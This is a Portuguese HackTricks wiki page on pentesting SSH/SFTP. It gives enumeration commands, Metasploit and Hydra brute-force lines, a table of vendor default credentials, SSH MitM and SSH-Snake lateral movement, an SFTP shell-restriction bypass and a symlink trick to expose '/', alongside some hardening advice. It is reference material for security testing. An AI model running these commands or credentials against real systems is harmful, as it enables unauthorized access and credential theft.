22 - Pentesting SSH/SFTP

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Bug bounty tip: inscreva-se para Intigriti, uma plataforma premium de bug bounty criada por hackers, para hackers! Junte-se a nós em https://go.intigriti.com/hacktricks hoje e comece a ganhar recompensas de até $100,000!

Basic Information

SSH (Secure Shell ou Secure Socket Shell) é um protocolo de rede que permite uma conexão segura a um computador através de uma rede não segura. É essencial para manter a confidencialidade e integridade dos dados ao acessar sistemas remotos.

Porta padrão: 22

22/tcp open  ssh     syn-ack

Servidores SSH:

openSSH – OpenBSD SSH, incluído nas distribuições BSD, Linux e Windows desde o Windows 10
Dropbear – implementação SSH para ambientes com poucos recursos de memória e processador, incluído no OpenWrt
PuTTY – implementação SSH para Windows, o cliente é comumente usado, mas o uso do servidor é mais raro
CopSSH – implementação do OpenSSH para Windows

Bibliotecas SSH (implementando do lado do servidor):

libssh – biblioteca C multiplataforma que implementa o protocolo SSHv2 com bindings em Python, Perl e R; é usada pelo KDE para sftp e pelo GitHub para a infraestrutura git SSH
wolfSSH – biblioteca de servidor SSHv2 escrita em ANSI C e direcionada para ambientes embarcados, RTOS e com recursos limitados
Apache MINA SSHD – biblioteca java Apache SSHD baseada no Apache MINA
paramiko – biblioteca de protocolo SSHv2 em Python

Enumeração

Captura de Banner

nc -vn <IP> 22

Auditoria ssh automatizada

ssh-audit é uma ferramenta para auditoria de configuração de servidor e cliente ssh.

https://github.com/jtesta/ssh-audit é um fork atualizado de https://github.com/arthepsy/ssh-audit/

Recursos:

Suporte ao protocolo SSH1 e SSH2;
analisar a configuração do cliente SSH;
capturar banner, reconhecer dispositivo ou software e sistema operacional, detectar compressão;
coletar algoritmos de troca de chaves, chave do host, criptografia e código de autenticação de mensagem;
saída de informações sobre algoritmos (disponível desde, removido/desativado, inseguro/fraco/legado, etc);
saída de recomendações de algoritmos (adicionar ou remover com base na versão do software reconhecido);
saída de informações de segurança (problemas relacionados, lista de CVE atribuída, etc);
analisar a compatibilidade da versão SSH com base nas informações do algoritmo;
informações históricas do OpenSSH, Dropbear SSH e libssh;
funciona em Linux e Windows;
sem dependências

usage: ssh-audit.py [-1246pbcnjvlt] <host>

-1,  --ssh1             force ssh version 1 only
-2,  --ssh2             force ssh version 2 only
-4,  --ipv4             enable IPv4 (order of precedence)
-6,  --ipv6             enable IPv6 (order of precedence)
-p,  --port=<port>      port to connect
-b,  --batch            batch output
-c,  --client-audit     starts a server on port 2222 to audit client
software config (use -p to change port;
use -t to change timeout)
-n,  --no-colors        disable colors
-j,  --json             JSON output
-v,  --verbose          verbose output
-l,  --level=<level>    minimum output level (info|warn|fail)
-t,  --timeout=<secs>   timeout (in seconds) for connection and reading
(default: 5)
$ python3 ssh-audit <IP>

Veja em ação (Asciinema)

Chave SSH pública do servidor

ssh-keyscan -t rsa <IP> -p <PORT>

Algoritmos de Cifração Fracos

Isso é descoberto por padrão pelo nmap. Mas você também pode usar sslcan ou sslyze.

Scripts do Nmap

nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

Shodan

ssh

Força bruta de nomes de usuário, senhas e chaves privadas

Enumeração de Nomes de Usuário

Em algumas versões do OpenSSH, você pode fazer um ataque de temporização para enumerar usuários. Você pode usar um módulo do metasploit para explorar isso:

msf> use scanner/ssh/ssh_enumusers

Brute force

Algumas credenciais ssh comuns aqui e aqui e abaixo.

Força Bruta de Chave Privada

Se você conhece algumas chaves privadas ssh que poderiam ser usadas... vamos tentar. Você pode usar o script nmap:

https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html

Ou o módulo auxiliar do MSF:

msf> use scanner/ssh/ssh_identify_pubkeys

Or use ssh-keybrute.py (python3 nativo, leve e com algoritmos legados habilitados): snowdroppe/ssh-keybrute.

Known badkeys can be found here:

ssh-badkeys/authorized at master · rapid7/ssh-badkeysGitHub

Weak SSH keys / Debian predictable PRNG

Alguns sistemas têm falhas conhecidas na semente aleatória usada para gerar material criptográfico. Isso pode resultar em um espaço de chave drasticamente reduzido que pode ser quebrado por força bruta. Conjuntos pré-gerados de chaves geradas em sistemas Debian afetados por PRNG fraco estão disponíveis aqui: g0tmi1k/debian-ssh.

Você deve olhar aqui para procurar chaves válidas para a máquina da vítima.

Kerberos

crackmapexec usando o protocolo ssh pode usar a opção --kerberos para autenticar via kerberos. Para mais informações, execute crackmapexec ssh --help.

Default Credentials

Vendor

Usernames

Passwords

APC

apc, device

apc

Brocade

admin

admin123, password, brocade, fibranne

Cisco

admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin

admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme

Citrix

root, nsroot, nsmaint, vdiadmin, kvm, cli, admin

C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler

D-Link

admin, user

private, admin, user

Dell

root, user1, admin, vkernel, cli

calvin, 123456, password, vkernel, Stor@ge!, admin

EMC

admin, root, sysadmin

EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc

HP/3Com

admin, root, vcx, app, spvar, manage, hpsupport, opc_op

admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin

Huawei

admin, root

123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123

IBM

USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer

PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer

Juniper

netscreen

NetApp

admin

netapp123

Oracle

root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user

changeme, ilom-admin, ilom-operator, welcome1, oracle

VMware

vi-admin, root, hqadmin, vmware, admin

vmware, vmw@re, hqadmin, default

SSH-MitM

Se você estiver na rede local como a vítima que vai se conectar ao servidor SSH usando nome de usuário e senha, você pode tentar realizar um ataque MitM para roubar essas credenciais:

Caminho do ataque:

Redirecionamento de Tráfego: O atacante desvia o tráfego da vítima para sua máquina, efetivamente interceptando a tentativa de conexão ao servidor SSH.
Intercepção e Registro: A máquina do atacante atua como um proxy, capturando os detalhes de login do usuário ao fingir ser o servidor SSH legítimo.
Execução de Comandos e Revezamento: Finalmente, o servidor do atacante registra as credenciais do usuário, encaminha os comandos para o verdadeiro servidor SSH, os executa e envia os resultados de volta ao usuário, fazendo o processo parecer contínuo e legítimo.

SSH MITM faz exatamente o que foi descrito acima.

Para capturar e realizar o MitM real, você pode usar técnicas como spoofing ARP, spoofing DNS ou outras descritas nos ataques de Spoofing de Rede.

SSH-Snake

Se você quiser percorrer uma rede usando chaves privadas SSH descobertas em sistemas, utilizando cada chave privada em cada sistema para novos hosts, então SSH-Snake é o que você precisa.

SSH-Snake realiza as seguintes tarefas automaticamente e recursivamente:

No sistema atual, encontre quaisquer chaves privadas SSH,
No sistema atual, encontre quaisquer hosts ou destinos (user@host) que as chaves privadas possam ser aceitas,
Tente SSH em todos os destinos usando todas as chaves privadas descobertas,
Se um destino for conectado com sucesso, repete os passos #1 - #4 no sistema conectado.

É completamente auto-replicante e auto-propagante -- e completamente sem arquivos.

Config Misconfigurations

É comum que servidores SSH permitam login do usuário root por padrão, o que representa um risco significativo à segurança. Desabilitar o login root é um passo crítico para proteger o servidor. O acesso não autorizado com privilégios administrativos e ataques de força bruta podem ser mitigados fazendo essa alteração.

Para Desabilitar o Login Root no OpenSSH:

Edite o arquivo de configuração SSH com: sudoedit /etc/ssh/sshd_config
Altere a configuração de #PermitRootLogin yes para PermitRootLogin no.
Recarregue a configuração usando: sudo systemctl daemon-reload
Reinicie o servidor SSH para aplicar as alterações: sudo systemctl restart sshd

SFTP Brute Force

SFTP Brute Force

SFTP command execution

Há uma falha comum que ocorre com configurações SFTP, onde os administradores pretendem que os usuários troquem arquivos sem habilitar o acesso remoto ao shell. Apesar de configurar usuários com shells não interativos (por exemplo, /usr/bin/nologin) e confiná-los a um diretório específico, uma brecha de segurança permanece. Os usuários podem contornar essas restrições solicitando a execução de um comando (como /bin/bash) imediatamente após o login, antes que seu shell não interativo designado assuma. Isso permite a execução não autorizada de comandos, minando as medidas de segurança pretendidas.

Exemplo daqui:

ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

$ ssh noraj@192.168.1.94 /bin/bash

Aqui está um exemplo de configuração segura de SFTP (/etc/ssh/sshd_config – openSSH) para o usuário noraj:

Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no

Esta configuração permitirá apenas SFTP: desabilitando o acesso ao shell forçando o comando de início e desabilitando o acesso TTY, mas também desabilitando todo tipo de encaminhamento de porta ou tunelamento.

SFTP Tunneling

Se você tiver acesso a um servidor SFTP, também pode tunelar seu tráfego através disso, por exemplo, usando o encaminhamento de porta comum:

sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>

SFTP Symlink

O sftp tem o comando "symlink". Portanto, se você tiver direitos de gravação em alguma pasta, pode criar symlinks de outras pastas/arquivos. Como você provavelmente está preso dentro de um chroot, isso não será especialmente útil para você, mas, se você puder acessar o symlink criado a partir de um serviço não-chroot (por exemplo, se você puder acessar o symlink pela web), você poderia abrir os arquivos vinculados através da web.

Por exemplo, para criar um symlink de um novo arquivo "froot" para "/":

sftp> symlink / froot

Se você puder acessar o arquivo "froot" via web, poderá listar a pasta raiz ("/") do sistema.

Métodos de autenticação

Em ambientes de alta segurança, é uma prática comum habilitar apenas a autenticação baseada em chave ou autenticação de dois fatores, em vez da simples autenticação baseada em senha. Mas muitas vezes, os métodos de autenticação mais fortes são habilitados sem desabilitar os mais fracos. Um caso frequente é habilitar publickey na configuração do openSSH e defini-lo como o método padrão, mas não desabilitar password. Assim, usando o modo verbose do cliente SSH, um atacante pode ver que um método mais fraco está habilitado:

ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

Por exemplo, se um limite de falha de autenticação estiver definido e você nunca tiver a chance de acessar o método de senha, você pode usar a opção PreferredAuthentications para forçar o uso desse método.

ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

Revisar a configuração do servidor SSH é necessário para verificar se apenas os métodos esperados estão autorizados. Usar o modo verbose no cliente pode ajudar a ver a eficácia da configuração.

Config files

ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa

Fuzzing

Referências

Você pode encontrar guias interessantes sobre como fortalecer o SSH em https://www.ssh-audit.com/hardening_guides.html
https://community.turgensec.com/ssh-hacking-guide

Dica de bug bounty: inscreva-se na Intigriti, uma plataforma de bug bounty premium criada por hackers, para hackers! Junte-se a nós em https://go.intigriti.com/hacktricks hoje e comece a ganhar recompensas de até $100,000!

Comandos Automáticos HackTricks

Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening

Entry_1:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh

Entry_2:
Name: consolesless mfs enumeration
Description: SSH enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)